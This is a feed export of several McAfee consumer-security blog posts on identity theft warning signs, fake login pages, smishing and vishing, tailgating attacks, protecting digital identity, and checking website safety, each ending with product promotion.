Further, using online protection software can help you stay safer still with features that make your time online more private and secure while also preventing you from clicking on any of those malicious links or attachments that crop up during Diwali—and any time of year. 

The post Protect yourself from scams this Diwali appeared first on McAfee Blog.

]]>
Top Signs of Identity Theft https://www.mcafee.com/blogs/privacy-identity-protection/top-signs-of-identity-theft/ Sun, 23 Oct 2022 13:32:08 +0000 https://www.mcafee.com/blogs/?p=130441

When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a problem.   A missing bill or a mysterious charge on...

The post Top Signs of Identity Theft appeared first on McAfee Blog.

]]>

When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a problem.  

A missing bill or a mysterious charge on your credit card could be the tip of an identity theft iceberg, one that can run deep if left unaddressed. Here, we’ll look at several signs of identity theft that likely need some investigation and the steps you can take to take charge of the situation.  

How does identity theft happen in the first place?  

Unfortunately, it can happen in several ways.   

In the physical world, it can happen simply because you lost your wallet or debit card. However, there are also cases where someone gets your information by going through your mail or trash for bills and statements. In other more extreme cases, theft can happen by someone successfully registering a change of address form in your name (although the U.S. Postal Service has security measures in place that make this difficult).   

In the digital world, that’s where the avenues of identity theft blow wide open. It could come by way of a data breach, a thief “skimming” credit card information from a point-of-sale terminal, or by a dedicated crook piecing together various bits of personal information that have been gathered from social media, phishing attacks, or malware designed to harvest information. Additionally, thieves may eavesdrop on public Wi-Fi and steal information from people who’re shopping or banking online without the security of a VPN.    

Regardless of how crooks pull it off, identity theft is on the rise. According to the Federal Trade Commission (FTC), identity theft claims jumped up from roughly 650,000 claims in 2019 to nearly 1.4 million in 2020—practically double. Of the reported fraud cases where a dollar loss was reported, the FTC calls out the following top three contact methods for identity theft:  

  • Online ads that direct you to a scammer’s site are designed to steal your information.  
  • Malicious websites and apps also steal information when you use them.  
  • Social media scams lure you into providing personal information, whether through posts or direct messages.  

However, phone calls, texts, and email remain the most preferred contact methods that fraudsters use, even if they are less successful in creating dollar losses than malicious websites, ads, and social media.  

What are some signs of identity theft?  

Identity thieves leave a trail. With your identity in hand, they can charge things to one or more of your existing accounts—and if they have enough information about you, they can even create entirely new accounts in your name. Either way, once an identity thief strikes, you’re probably going to notice that something is wrong. Possible signs include:  

  • You start getting mail for accounts that you never opened.   
  • Statements or bills stop showing up from your legitimate accounts.  
  • You receive authentication messages for accounts you don’t recognize via email, text, or phone.   
  • Debt collectors contact you about an account you have no knowledge of.  
  • Unauthorized transactions, however large or small, show up in your bank or credit card statements.  
  • You apply for credit and get unexpectedly denied.  
  • And in extreme cases, you discover that someone else has filed a tax return in your name.  

As you can see, the signs of possible identity theft can run anywhere from, “Well, that’s strange …” to “OH NO!” However, the good news is that there are several ways to check if someone is using your identity before it becomes a problem – or before it becomes a big problem that gets out of hand.   

Steps to take if you suspect that you’re the victim of identity theft  

The point is that if you suspect fraud, you need to act right away. With identity theft becoming increasingly commonplace, many businesses, banks, and organizations have fraud reporting mechanisms in place that can assist you should you have any concerns. With that in mind, here are some immediate steps you can take:  

1) Notify the companies and institutions involved 

Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account when you get your free credit report, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.   

2) File a police report 

Some businesses will require you to file a local police report to acquire a case number to complete your claim. Even beyond a business making such a request, filing a report is still a good idea. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well.  

3) Contact the Federal Trade Commission (FTC) 

The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop.  

4) Place a fraud alert and consider a credit freeze 

You can place a free one-year fraud alert with one of the major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. A fraud alert will make it tougher for thieves to open accounts in your name, as it requires businesses to verify your identity before issuing new credit in your name.  

A credit freeze goes a step further. As the name implies, a freeze prohibits creditors from pulling your credit report, which is needed to approve credit. Such a freeze is in place until you lift it, and it will also apply to legitimate queries as well. Thus, if you intend to get a loan or new credit card while a freeze is in place, you’ll likely need to take extra measures to see that through. Contact each of the major credit bureaus (Experian, TransUnion, Equifax) to put a freeze in place or lift it when you’re ready.  

5) Dispute any discrepancies in your credit reports 

This can run the gamut from closing any false accounts that were set up in your name, removing bogus charges, and correcting information in your credit report such as phony addresses or contact information. With your FTC report, you can dispute these discrepancies and have the business correct the record. Be sure to ask for written confirmation and keep a record of all documents and conversations involved.   

6) Contact the IRS, if needed 

If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid from an employer you don’t know, contact that employer as well and let them know of possible fraud—namely that someone has stolen your identity and that you don’t truly work for them.  

Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call or apply harassing pressure tactics—only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them.  

7) Continue to monitor your credit report, invoices, and statements 

Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely.  

Preventing identity theft 

With all the time we spend online as we bank, shop, and simply surf, we create and share all kinds of personal information—information that can get collected and even stolen. The good news is that you can prevent theft and fraud with online protection software, such as McAfee+ Ultimate 

With McAfee+ Ultimate you can: 

  • Monitor your credit activity on all three major credit bureaus to stay on top of unauthorized use.​ 
  • Also monitor the dark web for breaches involving your personal info and notify you if it’s found.​ 
  • Lock or freeze your credit file to help prevent accounts from being opened in your name. 
  • Remove your personal info from over 40 data broker sites collecting and selling it. 
  • Restore your identity with a licensed expert should the unexpected happen.​ 
  • Receive $1M identity theft and stolen funds coverage along with additional $25K ransomware coverage. 

In all, it’s our most comprehensive privacy, identity, and device protection plan, built for a time when we rely so heavily on the internet to go about our day, whether that’s work, play, or simply getting things done. 

Righting the wrongs of identity theft: deep breaths and an even keel  

Realizing that you’ve become a victim of identity theft carries plenty of emotion with it, which is understandable—the thief has stolen a part of you to get at your money, information, and even reputation. Once that initial rush of anger and surprise has passed, it’s time to get clinical and get busy. Think like a detective who’s building – and closing – a case. That’s exactly what you’re doing. Follow the steps, document each one, and build up your case file as you need. Staying cool, organized, and ready with an answer for any questions you’ll face in the process of restoring your identity will help you see things through.  

Once again, this is a good reminder that vigilance is the best defense against identity theft from happening in the first place. While there’s no absolute, sure-fire protection against it, there are several things you can do to lower the odds in your favor. And at the top of the list is keeping consistent tabs on what’s happening across your credit reports and accounts.  

The post Top Signs of Identity Theft appeared first on McAfee Blog.

]]>
How to Spot Fake Login Pages  https://www.mcafee.com/blogs/privacy-identity-protection/how-to-spot-fake-login-pages/ Sat, 22 Oct 2022 00:23:07 +0000 https://www.mcafee.com/blogs/?p=126926

Have you ever come across a website that just didn’t look quite right? Perhaps the company logo looked slightly misshapen, or the...

The post How to Spot Fake Login Pages  appeared first on McAfee Blog.

]]>

Have you ever come across a website that just didn’t look quite right? Perhaps the company logo looked slightly misshapen, or the font seemed off-brand. Odds are, you landed on a phony version of a legitimate corporation’s website—a tried and true tactic relied on by many cybercriminals.  

Fake Login Pages Explained  

A fake login page is essentially a knock-off of a real login page used to trick people into entering their login credentials, which hackers can later use to break into online accounts. These websites mirror legitimate pages by using company logos, fonts, formatting, and overall templates. Depending on the attention to detail put in by the hackers behind the imposter website, it can be nearly impossible to distinguish from the real thing. Consequentially, fake login pages can be highly effective in their end goal: credential theft.  

How do these pages get in front of a consumer in the first place? Typically, scammers will target unsuspecting recipients with phishing emails spoofing a trusted brand. These emails may state that the user needs to reset their password or entice them with a deal that sounds too good to be true. If the consumer clicks on the link in the email, they will be directed to the fake login page and asked to enter their username and password. Once they submit their information, cybercriminals can use the consumer’s data to conduct credential stuffing attacks and hack their online profiles. This could lead to credit card fraud, data extraction, wire transfers, identity theft, and more. 

How Fake Login Pages Are Affecting Canadians 

Scammers have recently targeted Canadians with attacks leveraging fake login pages to harvest personal data. For example, criminals preyed on employees who were expecting COVID-19 relief grants in the form of the CERB (Canada Emergency Response Benefit). These funds were sent via an electronic transfer from Interac, a legitimate Canadian interbank network. However, a phishing campaign spoofing Interac’s e-transfer service circulated emails claiming that the Canada Revenue Agency (CRA) made a CERB deposit of $1,957.50 CAD.  

These emails directed recipients to a fake CRA login page, which then redirected to a phony Interac e-transfer site where users were asked to select their personal bank. From there, the recipient was asked to enter their username, card number, password, security questions and answers for their online banking profile, and other personally identifiable information—providing all the information a criminal would need to hack into the user’s bank account.  

Why Fake Login Pages are Effective  

If you Google “fake login pages,” you will quickly find countless guides on how to create fake websites in seconds. Ethical concerns aside, this demonstrates just how common vector spoofed websites are for cyberattacks. While it has been easier to distinguish between real and fake login pages in the past, criminals are constantly updating their techniques to be more sophisticated, therefore making it more difficult for consumers to recognize their fraudulent schemes.  

One reason why fake login pages are so effective is due to inattentional blindness, or failure to notice something that is completely visible because of a lack of attention. One of the most famous studies on inattentional blindness is the “invisible gorilla test.” In this study, participants watched a video of people dressed in black and white shirts passing basketballs. Participants were asked to count the number of times the team in white passed the ball: 

Because participants were intently focused on counting the number of times the players in white passed the ball, more than 50% failed to notice the person in the gorilla costume walking through the game. If this is the first time you’ve seen this video, it’s likely that you didn’t notice the gorilla, the curtain changing color from red to gold, or the player in black leaving the game. Similarly, if you come across a well-forged login page and aren’t actively looking for signs of fraud, you could inherently miss a cybercriminal’s “invisible gorilla.” That’s why it’s crucial for even those with phishing training to practice caution when they come across a website asking them to take action or enter personal details.  

How to Steer Clear of Fake Login Pages  

The most important defense against steering clear of fake login pages is knowing how to recognize them. Follow these tips to help you decipher between a legitimate and a fake website:  

1. Don’t fall for phishing  

Most fake login pages are circulated vis phishing messages. If you receive a suspicious message that asks for personal details, there are a few ways to determine if it was sent by a phisher aiming to steal your identity. Phishers often send messages with a tone of urgency, and they try to inspire extreme emotions such as excitement or fear. If an unsolicited email urges you to “act fast!” slow down and evaluate the situation. 

2. Look for misspellings or grammatical errors  

Oftentimes, hackers will use a URL for their spoofed website that is just one character off from the legitimate site, such as using “www.rbcr0yalbank.com” versus “www.rbcroyalbank.com.” Before clicking on any website from an email asking you to act, hover over the link with your cursor. This will allow you to preview the URL and identify any suspicious misspellings or grammatical errors before navigating to a potentially dangerous website. 

3. Ensure the website is secured with HTTPS 

HTTPS, or Hypertext Transfer Protocol Secure, is a protocol that encrypts your interaction with a website. Typically, websites that begin with HTTPS and feature a padlock in the top left corner are considered safer. However, cybercriminals have more recently developed malware toolkits that leverage HTTPS to hide malware from detection by various security defenses. If the website is secured with HTTPS, ensure that this isn’t the only way you’re analyzing the page for online safety.  

4. Enable multi-factor authentication 

Multi-factor authentication requires that users confirm a collection of things to verify their identity—usually something they have, and a factor unique to their physical being—such as a retina or fingerprint scan. This can prevent a cybercriminal from using credential-stuffing tactics (where they will use email and password combinations to hack into online profiles) to access your network or account if your login details were ever exposed during a data breach.  

5. Sign up for an identity theft alert service 

An identity theft alert service warns you about suspicious activity surrounding your personal information, allowing you to jump to action before irreparable damage is done. McAfee Total Protection not only keeps your devices safe from viruses but gives you the added peace of mind that your identity is secure, as well.  

The post How to Spot Fake Login Pages  appeared first on McAfee Blog.

]]>
What Is Smishing and Vishing, and How Do You Protect Yourself https://www.mcafee.com/blogs/internet-security/what-is-smishing/ Thu, 20 Oct 2022 19:00:56 +0000 https://www.mcafee.com/blogs/?p=160704

Smishing and vishing are scams where criminals attempt to get users to click a fraudulent link through a phone text...

The post What Is Smishing and Vishing, and How Do You Protect Yourself appeared first on McAfee Blog.

]]>

Smishing and vishing are scams where criminals attempt to get users to click a fraudulent link through a phone text message, email, or voicemail. These scams are becoming increasingly popular as cybercriminals try to take advantage of people who are more likely to fall for them, such as those who aren’t as familiar with technology or who may be experiencing a crisis.

Be aware that cybercrime and hacking can happen to anyone. Criminals are always looking for new ways to exploit people, and they know that others may not be cautious or recognize the warning signs of phishing scams when using the internet. That’s why it’s important to be aware of the different types of cybercrime and how to protect yourself.

This article discusses how to protect yourself from smishing attempts and scams where criminals try to get you to click on a fraudulent link or respond to their voicemail message to steal your personal data.

What is smishing?

Most people are familiar with phishing scams, where scammers try to trick you into giving them your personal or financial information by pretending to be a legitimate company or organization. But have you ever heard of smishing or vishing?

Smishing is a type of phishing scam where attackers send SMS messages (or text messages) to trick victims into sharing personal information or installing malware on their devices. Vishing is almost identical to smishing, except cybercriminals use VoIP (Voice over IP) to place phone calls to trick victims instead of SMS (short message service) messages.

Smishing messages often appear to be from a legitimate source, such as a well-known company or government agency. It may even include urgent language or threats in an effort to get victims to act quickly. In some cases, the message may also include a link that directs victims to a fake website where they are prompted to enter personal information or download malware.

Examples of a smishing text message

Here are some examples of smishing text messages hackers use to steal your personal details:

  • “We have detected unusual activity on your account. Please call this number to speak to a customer service representative.”
  • “You have won a free gift card! Click here to claim your prize.”
  • “Hi! We noticed that you’re a recent customer of ours. To finish setting up your account, please click this link and enter your personal information.”
  • “Urgent! Your bank account has been compromised. Please click this link to reset your password and prevent any further fraud.”
  • “Hey, it’s [person you know]! I’m in a bit of a bind and could really use your help. I sent you a link to my PayPal, could you send me some money?”

How dangerous can smishing be?

If you fall for a smishing scam, you could end up giving away your personal information or money. Cybercriminals use smishing messages to get personal and financial information, like your credit card number or access to your financial services.

For example, one type of smishing scam is when you get a text message that looks like it’s from your bank. The message might say there’s been suspicious activity on your account and that you need to click on a link to verify your identity. If you do click on the link, you’ll be taken to a fake website where you’ll be asked to enter your banking information. Once the scammers have your login information, they have access to clean out your account.

How can you protect yourself from smishing?

Smishing scams can be very difficult to spot, but there are some telltale signs to look for and steps to take to protect yourself.

Recognize the signs of a smishing text

One of the easiest ways to protect yourself from smishing scams is to be able to recognize the signs of a smishing text message. Here are some tips:

  • Be suspicious of any text messages that ask for personal information or include a link.
  • Look closely at the sender’s name and number. Fraudulent messages often come from spoofed numbers that may look similar to a legitimate number but with one or two digits off.
  • Look for errors in spelling or grammar. This can be another sign that the message is not legitimate.
  • Beware of any text messages that create a sense of urgency or are threatening in nature. Scammers often use these tactics to get you to act quickly without thinking.
  • If you’re not expecting a message from the sender, be extra cautious.
  • If you’re unsure whether a text message is legitimate, call the company or organization directly to verify.

Filter unknown text messages

While you can’t avoid smishing attacks altogether, you can block spam text messages you receive on your mobile phone. iPhone and Android have cybersecurity tools like spam filters and phone number blocking to help protect you from phishing attacks and malicious links.

To set up spam filters on your iPhone:

  1. Go to the Settings App
  2. Go to Messages
  3. Find the Filter Unknown Senders option and turn it on

To set up spam filters on your Android mobile device:

  1. Go to the Messaging App
  2. Choose Settings
  3. Tap Spam Protection and turn on Enable Spam Protection

Use McAfee Mobile Security

McAfee Mobile Security is a mobile security app that helps protect your phone from malware, phishing attacks, and other online threats. McAfee Mobile Security is available for Android and iOS cell phones.

One of the benefits of using McAfee Mobile Security is that it can help detect and block smishing attacks. With identity monitoring, McAfee Mobile Security monitors your sensitive information like email accounts, credit card numbers, phone numbers, Social Security numbers, and more to protect against identity theft. They notify you if they find any security breaches.

Other benefits include:

  • Antivirus
  • Secure VPN for privacy online
  • Identity monitoring for up to 10 emails
  • Guard your identity against risky Wi-Fi connections
  • Safe browsing
  • System Scan for the latest updates

Keep your device and information secure with McAfee Mobile Security

These days, our lives are more intertwined with our mobile devices than ever. We use them to stay connected with our loved ones on social media, conduct our business, and even access our most personal, sensitive data. It’s no surprise that mobile cybersecurity is becoming increasingly important.

McAfee Mobile Security is a comprehensive security solution that helps protect your device from viruses, malware, and other online threats. It also offers a variety of other features, like a secure VPN to protect your credit card numbers and other personal data.

Whether you’re browsing your favorite website, keeping up with friends on social media, or shopping online at Amazon, McAfee Mobile Security provides the peace of mind that comes from knowing your mobile device is safe and secure.

So why wait? Don‘t let the smishers win. Get started today with McAfee Mobile Security and rest easy knowing your mobile device and sensitive information are protected.

The post What Is Smishing and Vishing, and How Do You Protect Yourself appeared first on McAfee Blog.

]]>
What Are Tailgating Attacks and How to Protect Yourself From Them https://www.mcafee.com/blogs/internet-security/what-are-tailgating-attacks/ Thu, 20 Oct 2022 19:00:49 +0000 https://www.mcafee.com/blogs/?p=160459

Whether you’re spending time on the web or working in the office, you want peace of mind knowing that you...

The post What Are Tailgating Attacks and How to Protect Yourself From Them appeared first on McAfee Blog.

]]>

Whether you’re spending time on the web or working in the office, you want peace of mind knowing that you are in a safe environment. While most of us know to take precautions when online — protecting ourselves from things like phishing attacks and other cyber threats — we should also attend to our physical security.

One concern is tailgating — a social engineering attack where someone gets physical access to a business to take confidential information or do other harm.

Here are some ways to protect yourself from tailgating attacks, such as an unauthorized person following you into a restricted area while on the job.

What is a tailgating attack?

Tailgating is a type of social engineering attack where an unauthorized person gains physical access to an off-limits location — perhaps a password-protected area — where they might steal sensitive information, damage property, compromise user credentials or even install malware on computers.

“Piggybacking” is closely related to tailgating, but it involves consent from the duped employee. So, while a worker might be unaware that someone has tailgated them into a restricted area with piggybacking, the hacker might convince a worker to provide access because they are posing as, say, a delivery driver.

Who’s at risk of tailgating attacks?

Companies, particularly at risk of being targeted by tailgating scams, include those:

    • With many employees, often moving inside and out of the premises
    • With multiple entrance points into a building
    • That receive deliveries of food, packages, documents, and other things regularly
    • That have many subcontractors working for them
    • Where employees aren’t thoroughly trained in physical and cybersecurity protocols

Whether you’re spending time on the web or working in the office, you want peace of mind knowing that you are in a safe environment. While most of us know to take precautions when online — protecting ourselves from things like phishing attacks and other cyber threats — we should also attend to our physical security.

One concern is tailgating — a social engineering attack where someone gets physical access to a business to take confidential information or do other harm.

Here are some ways to protect yourself from tailgating attacks, such as an unauthorized person following you into a restricted area while on the job.

What is a tailgating attack?

Tailgating is a type of social engineering attack where an unauthorized person gains physical access to an off-limits location — perhaps a password-protected area — where they might steal sensitive information, damage property, compromise user credentials or even install malware on computers.

“Piggybacking” is closely related to tailgating, but it involves consent from the duped employee. So, while a worker might be unaware that someone has tailgated them into a restricted area with piggybacking, the hacker might convince a worker to provide access because they are posing as, say, a delivery driver.

Who’s at risk of tailgating attacks?

Companies, particularly at risk of being targeted by tailgating scams, include those:

  • With many employees, often moving inside and out of the premises
  • With multiple entrance points into a building
  • That receive deliveries of food, packages, documents, and other things regularly
  • That have many subcontractors working for them
  • Where employees aren’t thoroughly trained in physical and cybersecurity protocols

Generally speaking, companies with robust security systems in place — including using biometrics, badges, or other identity and information security measures — are better protected from tailgating and piggybacking attacks.

But that’s not to say that some smooth-talking fraudster can’t talk someone into letting them in or finding some way around those protections.

What are common tailgating methods?

Common types of tailgating attacks that you should be aware of on the job include:

  • Someone walking behind you into a secure area, depending on your common courtesy to keep the door open for them
  • A courier or delivery driver who aren’t what they seem
  • A courier or delivery driver who aren’t what they seem
  • Someone with their hands full of items to trick you into opening the door for them
  • A person who claims they’ve lost their work ID or forgotten it at home, so that you grant them admittance

How to protect yourself from tailgating attacks

Protecting yourself from tailgating attacks is partly a matter of learning about the issue, raising your level of awareness on the job, and depending on your employer, putting in place more effective security systems.

Some solutions include:

Increased security training

Many companies know how to train employees to recognize, avoid, and cope with online security issues but may forget to provide the same diligence to physical security. How to spot and deal with threats should be part of this training, plus cultivating an awareness of surroundings and people who might be out of place.

Management should offer a clearly stated security policy taught to everyone, which might insist that no one be allowed into a secure area without the proper pass or identification. As the security policy is updated, all employees should be aware of changes and additions.

These security measures should be part of an overall protection program, like McAfee® Total Protection, which includes antivirus software, a firewall, identity monitoring, password management, web protection, and more.

Smart badges and cards

If you have a large business spread over several floors, it can be hard for employees to know who works there and who doesn’t, leaving them susceptible to tailgating and piggybacking attacks. Requiring smart badges and cards to access restricted areas can help cut back on unauthorized intrusions and provide better access control.

Building fully staffed reception areas with dedicated security personnel could also be part of a larger security system.

Biometric scanners

Biometric scanners are an even more advanced way to provide proper authentication for a worker’s identity. They scan a unique physical or audible feature of a person and compare it to a database for approved personnel.

Examples of biometric security include:

  • Voice recognition
  • Iris recognition
  • Fingerprint scans
  • Facial recognition
  • Heart-rate sensors

Understanding social engineering

One reason people are vulnerable to physical and cyberattacks is that they lack education on social engineering and the kinds of threats it poses.

Workers need to understand the full range of social engineering techniques and know-how to protect themselves, whether in their social media accounts or physical work environment.

For their part, companies can use simulated phishing emails and tailgating attacks to raise awareness and underline how to follow protocols in dealing with them.

Video surveillance

If there are many ways to enter a business, it may make sense to put video surveillance on all entrances. Advanced video surveillance systems can use artificial intelligence (AI) and video analytics to scan the faces of people entering and compare them to a database of employee features.

Discover how McAfee can help keep devices secure from hacking

Whether at work or at home, people want to be secure from attacks by cybercriminals who seek to take personal information.

To add a layer of security to all their connected devices — including computers, smartphones, and tablets — an increasing number of people are turning to the comprehensive coverage of McAfee® Total Protection.

Features range from advanced monitoring of possible threats to your identity, automatic implementation of virtual private networks (VPNs) to deal with unsafe networks, and personal data clean-up, removing your information from high-risk data broker sites.

McAfee protection allows you to work and play online with greater peace of mind.

The post What Are Tailgating Attacks and How to Protect Yourself From Them appeared first on McAfee Blog.

]]>
Guide: Protecting Your Digital Identity https://www.mcafee.com/blogs/privacy-identity-protection/guide-protecting-your-digital-identity/ Thu, 20 Oct 2022 19:00:47 +0000 /blogs/?p=124805

People in their 20s and 30s are losing it online. And by it, I mean money—thanks to digital identity theft.  In its...

The post Guide: Protecting Your Digital Identity appeared first on McAfee Blog.

]]>

People in their 20s and 30s are losing it online. And by it, I mean money—thanks to digital identity theft. 

In its simplest form, your digital identity is made up of a whole host of things that can be traced back to you and who you are. That can range anywhere from photos you post online to online shopping accounts, email accounts to telephone numbers, and bank accounts to your tax ID.  

In this way, your digital identity is like dozens upon dozens of puzzle pieces made up of different accounts, ID numbers, and so forth. When put together, they create a picture of you. And that’s why those little puzzle pieces of your identity are such attractive targets for hackers. If they get the right combination of them, you can end up a victim of theft or fraud.  

Millennials are major targets for fraud 

Here’s what’s happening: people in their 20s and 30s were twice as likely than people 40 and over to report losing money while shopping online. That’s according to recent figures from the U.S. Federal Trade Commission (FTC), which also found that people in their 20s to 30s are far more likely to report losing money to fraud. What’s more, they’re also 77% more likely than older people to lose it by way of an email scam. 

And it’s no surprise younger adults get targeted this way. They’re far more likely than any other age group to use mobile apps for peer-to-peer payments, transfer money between accounts, deposit checks, and pay bills. In short, there’s a lot of money flowing through the palms of their hands thanks to their phones, as well as their computers. 

Protecting yourself from hackers and fraud means protecting your digital identity. And that can feel like a pretty huge task given all the information your digital identity includes. It can be done, though, especially if you think about your identity like a puzzle. A piece here, another piece there, can complete the picture (or complete it just enough) to give a hacker what they need to separate you from your money. Thus, the way to stay safe is to keep those puzzle pieces out of other people’s hands.  

Six ways you can protect your digital identity from hackers and fraud 

It’s actually not that tough. With a few new habits and a couple of apps to help you out, you can protect yourself from the headaches and flat-out pain of fraud. Here’s a list of straightforward things that you can get started on right away: 

1. Start with the basics—security software  

Protect yourself by protecting your stuff. Installing and using security software on your computers and phones can prevent all kinds of attacks and make you safer while you surf, bank, and shop online. I should emphasize it again—protect your phone. Only about half of people protect their phones even though they use it to hail rides, order food, send money to friends, and more. Going unprotected on your phone means you’re sending all that money on the internet in a way that’s far, far less safe than if you use online protection. 

2. Create strong passwords  

You hear this one all the time and for good reason—strong, unique passwords offer one of your best defenses against hackers. Never re-use them (or slight alterations of them) across the different platforms and services you use. Don’t forget to update them on the regular (that means at least every 60 days)! While that sounds like a lot of work, a password manager can keep on top of it all for you. And if your platform or service offers the use of two-factor authentication, definitely make use of that. It’s a further layer of security that makes hacking tougher for crooks. 

3. Keep up to date with your updates  

Updates have a way of popping up on our phones and computers nearly every day, resist the urge to put them off until later. Aside from making improvements, updates often include important security fixes. So, when you get an alert for your operating system or app on your devices, go ahead and update. Think of it as adding another line of defense from hackers who are looking to exploit old flaws in your apps.   

4. Think twice when you share  

Social media is one place hackers go to harvest personal information because people sometimes have a way of sharing more than they should. With info like your birthday, the name of your first school, your mother’s maiden name, or even the make of your first car, they can answer common security questions that could hack into your accounts. Crank up the privacy settings on your accounts so only friends and family can see your posts—and realize the best defense here is not to post any possibly sensitive info in the first place. Also, steer clear of those “quizzes” that sometimes pop up in your social feeds. Those are other ways that hackers try to gain bits of info that can put your identity at risk. 

5. Shred it  

Even though so many of us have gone paperless with our bills, identity theft by digging through the trash, or “dumpster diving,” is still a thing. Things like medical bills, tax documents, and checks still might make their way to your mailbox. You’ll want to dispose of them properly when you’re through with them. First, invest in paper shredder. Once you’ve online deposited that check or paid that odd bill, shred it so that any personal or account info on there can’t be read (and can be recycled securely). Second, if you’re heading out of town for a bit, have a friend collect your mail or have the post office put a temporary hold on your mail. That’ll prevent thieves from lifting personal info right from your mailbox while you’re away. 

6. Check your credit  

Even if you don’t think there’s a problem, go ahead and check your credit. The thing is, someone could be charging things against your name without you even knowing it. Depending on where you live, different credit reporting agencies keep tabs on people’s credit. In the U.S., the big ones are Equifax, Experian, and TransUnion. Also in the U.S., the Fair Credit Reporting Act (FCRA) requires these agencies to provide you with a free credit check at least once every 12 months. Canada, the UK, and other nations likewise offer ways to get a free credit report. Run down your options—you may be surprised by what you find. 

How do I know if my identity has been stolen?  

As I just mentioned, the quickest way to get sense of what’s happening with your identity is to check your credit. Identity theft goes beyond money. Crooks will steal identities to rent apartments, access medical services, and even get jobs. Things like that can show up on a credit report, such as when an unknown address shows up in a list of your current and former residences or when a company you’ve never worked for shows up as an employer. If you spot anything strange, track it down right away. Many businesses have fraud departments with procedures in place that can help you clear your name if you find a charge or service wrongfully billed under your name. 

Other signs are far more obvious. You may find collection agencies calling or even see tax notices appearing in your mailbox (yikes). Clearly, cases like those are telltale signs that something is really wrong. In that case, report it right away: 

  • If you live in the U.S. and think that someone is using your personal information, visit IdentityTheft.gov. 
  • In Canada, visit antifraudcentre-centreantifraude.ca for help.  
  • And in the UK, check out CIFAS, the UK’s fraud prevention service, at cifas.org.uk. 

Likewise, many nations offer similar government services. A quick search will point you in the right direction. 

Another step you can take is to ask each credit bureau to freeze your credit, which prevents crooks from using your personal information to open new lines of credit or accounts in your name. Fraud alerts offer another line of protection for you as well, and you can learn more about fraud alerts here. 

Keeping your digital identity in your hands 

With so many bits and pieces of information making up your digital identity, a broader way of keeping it safe involves asking yourself a question: what could happen if someone got their hands on this info? Further realizing that even little snippets of unsecured info can lead to fraud or theft in your name helps—even that un-shredded bill or innocuous refund check for a couple of bucks could give a crook the puzzle piece they need. You can keep your digital identity safe by keeping those pieces of info out of other people’s hands.    

The post Guide: Protecting Your Digital Identity appeared first on McAfee Blog.

]]>
How to Tell Whether a Website Is Safe or Unsafe https://www.mcafee.com/blogs/internet-security/how-to-tell-if-website-is-safe/ Thu, 20 Oct 2022 19:00:13 +0000 https://www.mcafee.com/blogs/?p=160701

It’s important to know that not all websites are safe to visit. In fact, some sites may contain malicious software...

The post How to Tell Whether a Website Is Safe or Unsafe appeared first on McAfee Blog.

]]>

It’s important to know that not all websites are safe to visit. In fact, some sites may contain malicious software (malware) that can harm your computer or steal your personal contact information or credit card numbers.

Phishing is another common type of web-based attack where scammers try to trick you into giving them your personal information, and you can be susceptible to this if you visit a suspicious site.

Identity theft is a serious problem, so it’s important to protect yourself when browsing the web. Online security threats can be a big issue for internet users, especially when visiting new websites or following site links.

So how can you tell if you’re visiting a safe website or an unsafe website? You can use a few different methods. This page discusses key things to look for in a website so you can stay safe online.

Key signs of website safety and security

When you’re visiting a website, a few key indicators can help determine whether the site is safe. This section explores how to check the URL for two specific signs of a secure website.

”Https:” in the website URL

“Https” in a website URL indicates that the website is safe to visit. The “s” stands for “secure,” and it means that the website uses SSL (Secure Sockets Layer) encryption to protect your information. A verified SSL certificate tells your browser that the website is secure. This is especially important when shopping online or entering personal information into a website.

When you see “https” in a URL, the site is using a protocol that encrypts information before it’s sent from your computer to the website’s server. This helps prevent anyone from intercepting and reading your sensitive information as it’s transmitted.

A lock icon near your browser’s URL field

The padlock icon near your browser’s URL field is another indicator that a webpage is safe to visit. This icon usually appears in the address bar and means the site uses SSL encryption. Security tools and icon and warning appearances depend on the web browser.

Let’s explore the cybersecurity tools on the three major web browsers:

  • Safari. In the Safari browser on a Mac, you can simply look for the lock icon next to the website’s URL in the address bar. The lock icon will be either locked or unlocked, depending on whether the site uses SSL encryption. If it’s an unsafe website, Safari generates a red-text warning in the address bar saying “Not Secure” or “Website Not Secure” when trying to enter information in fields meant for personal data or credit card numbers. Safari may also generate an on-page security warning stating, “Your connection is not private” or “Your connection is not secure.”
  • Google Chrome. In Google Chrome, you’ll see a gray lock icon (it was green in previous Chrome versions) on the left of the URL when you’re on a site with a verified SSL certificate. Chrome has additional indicator icons, such as a lowercase “i” with a circle around it. Click this icon to read pertinent information on the site’s cybersecurity. Google Safe Browsing uses security tools to alert you when visiting an unsafe website. A red caution symbol may appear to the left of the URL saying “Not secure.” You may also see an on-page security message saying the site is unsafe due to phishing or malware.
  • Firefox. Like Chrome, Mozilla’s Firefox browser will tag all sites without encryption with a distinctive marker. A padlock with a warning triangle indicates that the website is only partially encrypted and may not prevent cybercriminals from eavesdropping. A padlock with a red strike over it indicates an unsafe website. If you click on a field on the website, it’ll prompt you with a text warning stating, “This connection is not secure.”

In-depth ways to check a website’s safety and security

Overall, the ”https” and the locked padlock icon are good signs that your personal data will be safe when you enter it on a website. But you can ensure a website’s security is up to par in other ways. This section will explore five in-depth methods for checking website safety.

